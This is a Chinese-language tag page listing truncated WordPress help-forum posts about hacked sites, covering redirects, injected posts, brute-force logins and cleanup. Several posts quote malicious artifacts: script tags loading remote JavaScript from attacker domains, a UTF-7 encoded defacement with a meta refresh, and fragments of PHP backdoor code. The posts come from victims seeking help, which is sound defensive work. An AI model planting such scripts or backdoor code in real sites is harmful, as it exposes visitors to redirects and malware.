您当前的位置:首页 > TAG信息列表 > hacked
被黑客攻击的网站重定向,仅在桌面上,帮助恢复
这是我的第一篇帖子,我试图寻找类似的问题,没有找到任何适合我的情况。无论如何最近我的堂兄弟网站被黑了,我决定去看看,作为一种练习来修复它。我对web开发几乎没有经验,所以我希望在这里得到一些有用的反馈。每当我在地址栏中键入URL(或在搜索引擎上搜索它)时,我都会被重定向到某个博客网站或某个你赢得iphone诈骗的网站。这也适用于网站的所有子页面。对我来说奇怪的是,它只发生在电脑上。当使用手机或在私人模式下尝试时,URL工作正常。此外,我只能通过键入url/WP登录来访问WP dashboard。php使用
我的WordPress博客向其他网站发送恶意流量
我在谷歌云计算引擎虚拟机上运行wordpress博客。几天前,我收到一封来自谷歌的电子邮件,告诉我检测到可能违反其可接受使用政策:我们最近检测到您的谷歌云项目wordpress博客(id:xxxxxx)IP XX。XXX。XXX。XXX一直在对第三方进行入侵企图,似乎违反了我们的服务条款。您可以通过确保您的项目流量预期指向第三方,并且您的项目没有受到影响来解决此问题。请检查来自所有实例的流量,并修复可能受此影响的任何其他实例。我提出上诉,向他们解释说我不知道情况,并要求提供更多细节。他们给了我一份来自Bi
如何在网站黑客攻击后从所有帖子中批量删除一行
我的Wordpress网站被黑客入侵,每个帖子都有<script src=\'https://crow.lowerthenskyactive.ga/m.js?n=ns1\' type=\'text/javascript\'></script>添加到我需要删除的每个帖子的末尾。我有375个帖子需要删除我已经试过了UPDATE wp_posts SET post_content = REPLACE (post_content, \'<p style="text-alig
多次扫描无法检测到恶意软件
我想通知并请求社区的帮助。发生的情况是,该恶意软件位于/wp-content/uploads/2020/Named-index文件夹中。phpAnd我在2017年的上传文件夹中找到了他。我觉得奇怪的是,任何在线数据库都检测不到它,甚至连Sucuri插件Wordfense都检测不到。。遵循代码(由于不适合该帖子,其中大部分内容已被删除)以下是恶意代码 if ( !class_exists( \'WPTemplateOptions\' ) ) { class WPTemplateOptions {&
WordPress禁止直接访问WordPress安装路径中的文件
我想在我的WordPress网站上添加一个安全功能,以阻止直接访问添加到WordPress安装根目录的文件,最近我发现一个恶意插件添加了一些文件来发送电子邮件。以下是恶意php 已添加代码。<?php $method = $_SERVER[\'REQUEST_METHOD\']; switch ($method) { case \'GET\': //Here Handle GET Request echo \'###ER
如何解决WordPress重定向(没有发现恶意软件)?
我有一个基于WordPress的网站。URL iawww.travelmakerismymiddlename.com在某种程度上,网站开始随机重定向-我不能告诉你哪个链接或页面专门重定向,因为这是完全随机的。问题是,我已经尝试了我所知道的一切,但它仍然重定向。我最近尝试的是从主机服务器下载文件并扫描它们以防恶意软件。我尝试了Malwarebytes,但没有找到恶意软件。我无法将其还原到更早的位置,因为我不知道它何时开始重定向,而且备份文件只执行了这么多(最早的文件都有重定向)。它有一个SSL,但我想我只是
从服务器IP本身发起的多次尝试登录?
我最近使用easyengine将几个站点迁移到了一个新服务器上,它为每个WP网站创建了一组单独的docker映像。在我的服务器内部,每个站点都有一个专用IP(172.x.x.x),当然,在外部,域通过dns路由到指定的外部服务器,并正常提供服务。我注意到,我迁移的几个站点出现了登录失败的情况(如活动日志插件所示),这些站点没有引用,似乎来自服务器本身的私有IP。当我检查日志时,我在故障发生的准确时间看到如下条目:172.19.0.1 - - [29/Oct/2021:10:20:27 +0000] &qu
我的WordPress网站被不想要的弹出窗口黑了
我的wordpress上有一家woo commerce商店,但我遭到了某种黑客的攻击。正如你在图片中看到的,我的网站顶部有很多弹出链接。我怎样才能清洗这个?我没有任何备份。谢谢
网站被黑客攻击-已修复-现在无法激活主题
我的wordpress网站被黑了,我修复了问题,但不得不删除了215个主题(被黑的主题)。我最初使用的主题是不同的,但黑客入侵了215主题。删除主题后,我返回到wordpress仪表板,看到以下内容:正如你所看到的,它没有识别任何主题,我无法激活它们。主页也是空白的。有没有关于如何通过FTP激活主题的想法?谢谢
Security issues with WP sites
我刚刚不得不处理我的一些WordPress网站被黑客攻击的问题。第一次放置索引。html文件,并补充了我的管理员用户。一旦我觉得我清理了这个,它再次发生,但它改变了我的标题标签为“被巴拉狙击手黑客”,并从每个网站的页脚小部件被删除。我的WHM帐户不是仅限WP的网站,所以我知道它不可能是黑客从那里访问的。我已经在google上搜索了很多次,并纠正了一些问题,例如没有将id=1设置为admin、captcha插件等。我觉得这会再次发生。我在这里是想问一下,今天或昨天是否有人遇到过这个问题,或者你是否曾经被巴拉
如何在TinyMCE中禁用/禁用<脚本>和<iframe>标记?
我的一个客户刚刚通过恶意脚本和iFrame注入了200篇帖子。网站现已全部清空。当我的客户端计算机被感染时,用户更新帖子/页面,将它们放入内容中。(虽然只在TinyMCE编辑器中,但没有指定给特定页面/帖子的任何其他自定义字段)此网站的确切脚本如下所示:<script src=\"//serverads.net/599b47260394deb2d8.js\"></script> <script src=\"//pulseadnetwork.com/a/display.
Files automatically added
今天,iTheme Security警告我添加了2个文件:wp -content / uploads / GeoIP.dat wp / content / uploads / GeoIPv6.dat 这些是从哪里来的?它们的目的是什么?
检查本地Wordpress php文件和数据库中是否有恶意代码的有效方法?
首先,我不是WP超级用户。最近我的一个朋友被黑客攻击了,我的意思是他很长时间没有更新他的WP,并且被注入了发送垃圾邮件的恶意代码,所以他的主人阻止了他。他只有被感染的文件,这些文件已经被开发人员检查和清理。。。手工现在,我应该安装一个运行他的代码的新服务器。但我想让一个工具至少检查主题和DB的代码。我将重新安装并重新安装插件,以确保这些插件没有错误代码。所以我只有手工清理的代码,所以我不知道我们之前有什么注入,所以我无法搜索相同的模式或任何东西。我找到了一些工具,可以检查WP网站上的错误代码,比如sucu
如何防止来自数千个不同IP的wp登录暴力攻击?
调查问题。我发现我接到了很多电话wp-login, 但是来自许多不同的ip。关于如何处理它有什么想法吗?
我的可湿性粉剂网站和密码被黑了,怎么办?
今天我意识到我的WordPress博客被黑客攻击了。我注意到了,因为标题改成了:+ADw-/title+AD4-Hacked By *** +ADw-meta http-equiv+AD0AIg-refresh+ACI content+AD0AIg-5+ADs-URL+AD0-http://***+ACIAPg +ADw-DIV style+AD0AIg-DISPLAY: none+ACIAPgA8-xmp+AD4- 过了一段时间,我无法使用常用密码登录,所以我转到主机的cPanel,并尝试在w
Index.php WordPress中的恶意代码
我发现总是<?php header(\"Content-type: text/html; charset=utf-8\"); @set_time_limit(0); $xmlname = \'mapss.xml\'; $jdir = \'\'; $smuri = smrequest_uri(); if($smuri==\'\'){ $smuri=\'/\'; } $smuri = base64_encode($smuri
我已经从我们的网站上删除了恶意软件,但当我再次尝试从谷歌搜索这个词时,它仍然在那里
我不确定这一页是否正确。但如果没有,请重定向到正确的页面。我已经从我们的网站上删除了恶意软件,但当我再次尝试从谷歌搜索这个词时,它仍然存在。请在这方面提供帮助,或者我应该采取什么必要的步骤。谢谢,梅丽莎